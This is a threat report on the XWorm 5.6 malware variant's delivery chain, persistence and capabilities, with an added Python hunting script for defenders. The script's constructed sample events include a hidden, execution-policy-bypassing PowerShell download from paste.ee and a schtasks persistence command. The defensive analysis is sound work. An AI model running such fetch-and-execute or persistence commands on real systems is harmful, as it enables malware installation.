XWorm is malware known for its obfuscation techniques and its ability to evade detection, making it a significant cybersecurity threat. Netskope recently found a new variant delivered via a Windows script file. Originally discovered in 2022, XWorm has since evolved to version 5.6.
All About the New XWorm Variant
This .NET-based threat begins its infection through a Windows Script File (WSF) that downloads and executes an obfuscated PowerShell script from paste[.]ee.
The script creates several files (VsLabs.vbs, VsEnhance.bat, and VsLabsData.ps1) in C:\ProgramData\Music\Visuals and establishes persistence via a scheduled task named MicroSoftVisualsUpdater.
XWorm uses evasive techniques such as reflective code loading and process injection into legitimate processes like RegSvcs.exe. It communicates with its C2 server over TCP sockets, encrypting traffic with AES-ECB and deriving the key from a modified MD5 hash.
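The delivery chain described above leaves a consistent trail of host artefacts: a script host spawning PowerShell, a command line that reaches paste[.]ee, file writes into C:\ProgramData\Music\Visuals, a scheduled task named MicroSoftVisualsUpdater, and a foreign process touching RegSvcs.exe. The following Python script is an added example (not Netskope's code or tooling) that turns those artefacts into simple hunting rules and runs them over a handful of constructed, Sysmon-style `key=value` events. The event format, the sample lines and the rule names are assumptions for illustration; only the indicators themselves come from the write-up.

```python
"""Hunt for the XWorm delivery-chain artefacts described above.
Example code, not from the original article; event lines are constructed."""
import re
from dataclasses import dataclass

# Indicators taken from the write-up; all comparisons are case-insensitive.
DROP_DIR = r"c:\programdata\music\visuals"
DROPPED_FILES = {"vslabs.vbs", "vsenhance.bat", "vslabsdata.ps1"}
TASK_NAME = "microsoftvisualsupdater"
PASTE_HOST = "paste.ee"
INJECTION_TARGET = "regsvcs.exe"
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Constructed sample telemetry in a Sysmon-like key=value shape (assumed format,
# not real logs): WSF -> PowerShell -> paste.ee -> dropped files -> task -> injection.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\wscript.exe CommandLine="wscript.exe C:\Users\u\Downloads\invoice.wsf" ParentImage=C:\Windows\explorer.exe',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -ep bypass -c iwr https://paste.ee/r/PLACEHOLDER" ParentImage=C:\Windows\System32\wscript.exe',
    r'EventID=11 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename=C:\ProgramData\Music\Visuals\VsLabs.vbs',
    r'EventID=11 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename=C:\ProgramData\Music\Visuals\VsLabsData.ps1',
    r'EventID=1 Image=C:\Windows\System32\schtasks.exe CommandLine="schtasks /create /tn MicroSoftVisualsUpdater /tr C:\ProgramData\Music\Visuals\VsLabs.vbs /sc minute /mo 1" ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    r'EventID=8 SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe ParentImage=C:\Windows\explorer.exe',
]

_KV = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one key=value line; double-quoted values may contain spaces."""
    return {k: (quoted if full.startswith('"') else bare)
            for k, full, quoted, bare in _KV.findall(line)}


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


@dataclass
class Finding:
    rule: str
    line_no: int
    detail: str


def check_event(ev: dict, line_no: int) -> list:
    """Apply every rule to a parsed event; an event may trigger several rules."""
    hits = []
    eid = ev.get("EventID")
    image = _base(ev.get("Image", ""))
    parent = _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()

    # Rule 1: a Windows script host launching PowerShell (the WSF stage).
    if eid == "1" and image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append(Finding("wsf_spawns_powershell", line_no, f"{parent} -> {image}"))
    # Rule 2: the paste service used to fetch the obfuscated script.
    if eid == "1" and PASTE_HOST in cmd:
        hits.append(Finding("paste_ee_in_cmdline", line_no, cmd))
    # Rule 3: file creation in the drop directory or with one of the dropped names.
    if eid == "11":
        target = ev.get("TargetFilename", "").lower()
        if target.startswith(DROP_DIR) or _base(target) in DROPPED_FILES:
            hits.append(Finding("drop_dir_write", line_no, target))
    # Rule 4: the persistence task being registered.
    if eid == "1" and image == "schtasks.exe" and "/create" in cmd and TASK_NAME in cmd:
        hits.append(Finding("persistence_task", line_no, TASK_NAME))
    # Rule 5: another process opening or injecting into RegSvcs.exe.
    if eid in ("8", "10"):
        src = _base(ev.get("SourceImage", ""))
        tgt = _base(ev.get("TargetImage", ""))
        if tgt == INJECTION_TARGET and src != INJECTION_TARGET:
            hits.append(Finding("regsvcs_injection", line_no, f"{src} -> {tgt}"))
    return hits


def hunt(lines) -> list:
    """Run all rules over an iterable of event lines, in order."""
    findings = []
    for n, line in enumerate(lines, 1):
        findings.extend(check_event(parse_event(line), n))
    return findings


def summarize(findings) -> dict:
    """Count findings per rule, useful for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
    print(summarize(hunt(SAMPLE_EVENTS)))
```

Run against the constructed events, the script flags the six stages of the chain and leaves the benign notepad launch alone. Any one rule on its own is weak (script hosts do spawn PowerShell legitimately, and the drop path can be renamed in the next build), so the value is in correlating several hits on the same host within a short window; the file names and task name are the most brittle indicators, the script-host-to-PowerShell parent relationship and the RegSvcs.exe access pattern the most durable.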
The new features in version 5.6 include the ability to remove plugins and a “Pong” command for reporting response times.
The malware conducts thorough system checks, collecting information about hardware, software, and user privileges, and notifies attackers via Telegram when it successfully infects a system.
These methods enable XWorm to access sensitive data, gain remote control, and install more malware without being detected.
It modifies the hosts file for malicious DNS redirection and launches DDoS attacks by repeatedly sending POST requests to specified IP addresses and ports.
XWorm also takes screenshots using the CopyFromScreen function and saves them as JPEG images in memory before sending them out.
XWorm executes commands for system control (shutdown, restart), file operations, and remote code execution via PowerShell.
It downloads payloads, sends HTTP requests, and communicates with its C2 server while monitoring processes stealthily.
This toolkit gives attackers extensive control over compromised systems, making XWorm a significant threat.